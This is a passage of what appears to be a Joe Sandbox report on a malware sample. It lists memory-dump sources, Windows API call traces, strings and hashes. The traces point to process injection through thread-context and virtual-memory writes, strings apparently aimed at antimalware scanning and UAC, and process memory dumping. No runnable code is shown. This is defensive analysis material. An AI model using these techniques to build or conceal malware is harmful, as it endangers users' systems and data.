                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                          • API String ID: 667068680-597814768
                          • Opcode ID: de2aba2e45c38df419d8a24648db3b871e21f8a7cb4126cbddd14bc8901dfca5
                          • Instruction ID: fa2d7c08963535ea822810031a1ae9833ec43e1218a9759bc82fe18609e8881a
                          • Opcode Fuzzy Hash: de2aba2e45c38df419d8a24648db3b871e21f8a7cb4126cbddd14bc8901dfca5
                          • Instruction Fuzzy Hash: 69318FB0A90760EFEF10AFB8D885A6A37EAEB06740B5009F5F40ADF215D7749850CF51
                          APIs
                            • Part of subcall function 02B98824: LoadLibraryA.KERNEL32(00000000,00000000,02B9890B), ref: 02B98858
                            • Part of subcall function 02B98824: FreeLibrary.KERNEL32(74BF0000,00000000,02BE1388,Function_000065D8,00000004,02BE1398,02BE1388,05F5E0FF,00000040,02BE139C,74BF0000,00000000,00000000,00000000,00000000,02B9890B), ref: 02B988EB
                          • GetThreadContext.KERNEL32(00000000,02BE1420,ScanString,02BE13A4,02B9A77C,UacInitialize,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,UacInitialize,02BE13A4), ref: 02B99442
                            • Part of subcall function 02B97D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B97D74
                          • SetThreadContext.KERNEL32(00000000,02BE1420,ScanBuffer,02BE13A4,02B9A77C,ScanString,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,00000000,-00000008,02BE14F8,00000004,02BE14FC), ref: 02B9A157
                          • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02BE1420,ScanBuffer,02BE13A4,02B9A77C,ScanString,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,00000000,-00000008,02BE14F8), ref: 02B9A164
                            • Part of subcall function 02B987A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,UacScan), ref: 02B987B4
                            • Part of subcall function 02B987A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B987CE
                            • Part of subcall function 02B987A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize), ref: 02B9880A
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: Library$Thread$ContextFreeLoad$AddressMemoryProcResumeVirtualWrite
                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                          • API String ID: 3455621253-51457883
                          • Opcode ID: 45c716c9ed5a1993209342aecabf94c1a15bcaa3ae14377cc3bacf6e18bc45fc
                          • Instruction ID: e56dc092587a7425e98617c74bdd4ca2b52ea06b1914e488ed30daccc74e0ae1
                          • Opcode Fuzzy Hash: 45c716c9ed5a1993209342aecabf94c1a15bcaa3ae14377cc3bacf6e18bc45fc
                          • Instruction Fuzzy Hash: 7AE2E635A5011A9FDF11FBA4DC91ADE73BAAF89310F1084F1E109AB224DE35AE46CF51
                          APIs
                            • Part of subcall function 02B98824: LoadLibraryA.KERNEL32(00000000,00000000,02B9890B), ref: 02B98858
                            • Part of subcall function 02B98824: FreeLibrary.KERNEL32(74BF0000,00000000,02BE1388,Function_000065D8,00000004,02BE1398,02BE1388,05F5E0FF,00000040,02BE139C,74BF0000,00000000,00000000,00000000,00000000,02B9890B), ref: 02B988EB
                          • GetThreadContext.KERNEL32(00000000,02BE1420,ScanString,02BE13A4,02B9A77C,UacInitialize,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,UacInitialize,02BE13A4), ref: 02B99442
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: Library$ContextFreeLoadThread
                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                          • API String ID: 720575881-51457883
                          • Opcode ID: 4911698fa3d0bc7dd570b2f864237e3e6d22ad4f4448e2cf1b0bbf88f7cd3e5e
                          • Instruction ID: a0c72d54ce5fbdb53d6ce4596711ce11cad0a18ee8b1695d1722386a183ce621
                          • Opcode Fuzzy Hash: 4911698fa3d0bc7dd570b2f864237e3e6d22ad4f4448e2cf1b0bbf88f7cd3e5e
                          • Instruction Fuzzy Hash: 22E2D635A5011A9FDF11FBA4DC91ADE73BAAF89310F1084F1E109AB224DE35AE46CF51
                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B858D1
                          • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02B858E8
                          • lstrcpynA.KERNEL32(?,?,?), ref: 02B85918
                          • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B8597C
                          • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B859B2
                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B859C5
                          • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B859D7
                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B859E3
                          • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000), ref: 02B85A17
                          • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338), ref: 02B85A23
                          • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02B85A45
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                          • String ID: GetLongPathNameA$\$kernel32.dll
                          • API String ID: 3245196872-1565342463
                          • Opcode ID: 4573de47a3e10493b49ca72d7b493c51fd3a6bb6065726c6ffed4226b08a52d5
                          • Instruction ID: 78037737497b0d3f00325eaeac12c48656ba8a9215c633ecf892bccdd2660811
                          • Opcode Fuzzy Hash: 4573de47a3e10493b49ca72d7b493c51fd3a6bb6065726c6ffed4226b08a52d5
                          • Instruction Fuzzy Hash: FA415C71D00259AFDB20EAE8CCC8AEEB3ADEB08310F4545E5A15CE7241E770AA45CF54
                          APIs
                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B85B94
                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B85BA1
                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B85BA7
                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B85BD2
                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B85C19
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B85C29
                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B85C51
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B85C61
                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B85C87
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B85C97
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                          • API String ID: 1599918012-2375825460
                          • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                          • Instruction ID: 2cdaac62cca5567b1c7c5ac2aff5a96723207d703ffdc93bfd39531b8683dc98
                          • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                          • Instruction Fuzzy Hash: 21318471E4021C2AEB35EEB89C85FEF77AD9B04380F4501E1964CE6181DB749E84CF91
                          APIs
                          • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,UacScan), ref: 02B987B4
                          • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B987CE
                          • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize), ref: 02B9880A
                            • Part of subcall function 02B97D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B97D74
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                          • String ID: BCryptVerifySignature$bcrypt
                          • API String ID: 1002360270-4067648912
                          • Opcode ID: 0bea23942aea87216841285a5e6e1b1da5fbaf5cdb60f3508c492c187a9c2d49
                          • Instruction ID: 84cd771f6ba0f28fc70c2bcfcc91237e7cb19730c5a9ea82ae58ce33788c9fff
                          • Opcode Fuzzy Hash: 0bea23942aea87216841285a5e6e1b1da5fbaf5cdb60f3508c492c187a9c2d49
                          • Instruction Fuzzy Hash: F6F04471A91254FEEF10AF6CA845BB6739CD746395F2089B9F10D8B984C7705C50CB60
                          APIs
                            • Part of subcall function 02B84ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B84EDA
                          • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DB9E), ref: 02B9DB0B
                          • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B9DB45
                          • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B9DB72
                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B9DB7B
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: File$AllocCloseCreateStringWrite
                          • String ID:
                          • API String ID: 3308905243-0
                          • Opcode ID: ef6a40ba2f16e473eebded45b009db5efe4eaf50d30564eb835dc0ba84b5220e
                          • Instruction ID: 4c09621d0b36204d73890984c43506b9198a8dba053bfccdbf173aea4a719bf6
                          • Opcode Fuzzy Hash: ef6a40ba2f16e473eebded45b009db5efe4eaf50d30564eb835dc0ba84b5220e
                          • Instruction Fuzzy Hash: 0721BC71A40209BEEB10EAA4CD46F9EB7BDAB05B04F6144A1B704F71D0D7B46A048AA5
                          APIs
                          • RtlInitUnicodeString.NTDLL(?,?), ref: 02B9DA6C
                          • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DABE), ref: 02B9DA82
                          • NtDeleteFile.NTDLL(?), ref: 02B9DAA1
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: DeleteFileInitStringUnicode
                          • String ID:
                          • API String ID: 3559453722-0
                          • Opcode ID: 9f9d0a2dd6907f8f4fa19183ccd533d484cbe1667d02b26049347376f8ffe51a
                          • Instruction ID: 859238d7f6a49cac07242152b1ddf267ee39bfe1f41face0a37b1a6aec37dece
                          • Opcode Fuzzy Hash: 9f9d0a2dd6907f8f4fa19183ccd533d484cbe1667d02b26049347376f8ffe51a
                          • Instruction Fuzzy Hash: 8B014B75A0824AAEEF05FAA1CD81BCD77B9AB45704F5044E2E324F7091DA74AB148B25
                          APIs
                            • Part of subcall function 02B84ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B84EDA
                          • RtlInitUnicodeString.NTDLL(?,?), ref: 02B9DA6C
                          • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DABE), ref: 02B9DA82
                          • NtDeleteFile.NTDLL(?), ref: 02B9DAA1
                            • Part of subcall function 02B84C0C: SysFreeString.OLEAUT32(02B9E950), ref: 02B84C1A
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: String$AllocDeleteFileFreeInitUnicode
                          • String ID:
                          • API String ID: 2841551397-0
                          • Opcode ID: 8d7d4e99c2a9d409aabd3a9bab9d43f47259409cc5e42c6df8f2b3839e6b5afa
                          • Instruction ID: f38f1d291bb24399c9ca2f4a515438841b77be2ca70569558a0df89cd848262f
                          • Opcode Fuzzy Hash: 8d7d4e99c2a9d409aabd3a9bab9d43f47259409cc5e42c6df8f2b3839e6b5afa
                          • Instruction Fuzzy Hash: CA01E871A0420DAAEB11FAE1CD52FDEB7BDEB49700F5045B1E614E2190EB74AB148A64
                          APIs
                          • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02B87F7D
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: DiskFreeSpace
                          • String ID:
                          • API String ID: 1705453755-0
                          • Opcode ID: 60a0a3317bc6745db68fd0609a05e035b6386226a90ab679635ab5dbfaeb8164
                          • Instruction ID: b1f63745ac3f3c722d64e7c101b13e3215ace84cf0114bf9c2738571bfccfa55
                          • Opcode Fuzzy Hash: 60a0a3317bc6745db68fd0609a05e035b6386226a90ab679635ab5dbfaeb8164
                          • Instruction Fuzzy Hash: 7C11C0B5A00209AFDB04DF99CD819EFF7F9EFC8704B14C569A509EB254E6719A01CB90
                          APIs
                          • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B8A76A
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                          • Instruction ID: 0d2da3e715386df9dc3f847760234b00ef292f80ff2195287f8744c0f78bb985
                          • Opcode Fuzzy Hash: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                          • Instruction Fuzzy Hash: B2E0923570021417D311B5585C80AEAB3AD9758310F0041AAA90CC7341FEA09D408AE8
                          APIs
                          • GetVersionExA.KERNEL32(?,02BAC106,00000000,02BAC11E), ref: 02B8B722
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: Version
                          • String ID:
                          • API String ID: 1889659487-0
                          • Opcode ID: b55ecf5c71a4d3b20c721b975d93d8133e4585ecbfce8983f5b675dc26f2bdc8
                          • Instruction ID: 6ed1f1a30976d67122a7252295a0808533abcfdbd2e49e9b1844f7d1f51d011c
                          • Opcode Fuzzy Hash: b55ecf5c71a4d3b20c721b975d93d8133e4585ecbfce8983f5b675dc26f2bdc8
                          • Instruction Fuzzy Hash: 8EF0D4789443029FD358EF28D542A2977E5FB49B94F8089A9E898C7780E734D824CF52
                          APIs
                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02B8BDFA,00000000,02B8C013,?,?,00000000,00000000), ref: 02B8A7AB
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                          • Instruction ID: 6360eb046ed9bbe6610f0eb93b80c417d709762e4dd0583c7a35c0a0dd1e9c1b
                          • Opcode Fuzzy Hash: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                          • Instruction Fuzzy Hash: 54D05BBA30D1502AA210615A1D54D7B5BECCBC5761F00447EF54CC6240D2008C06D6B1
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
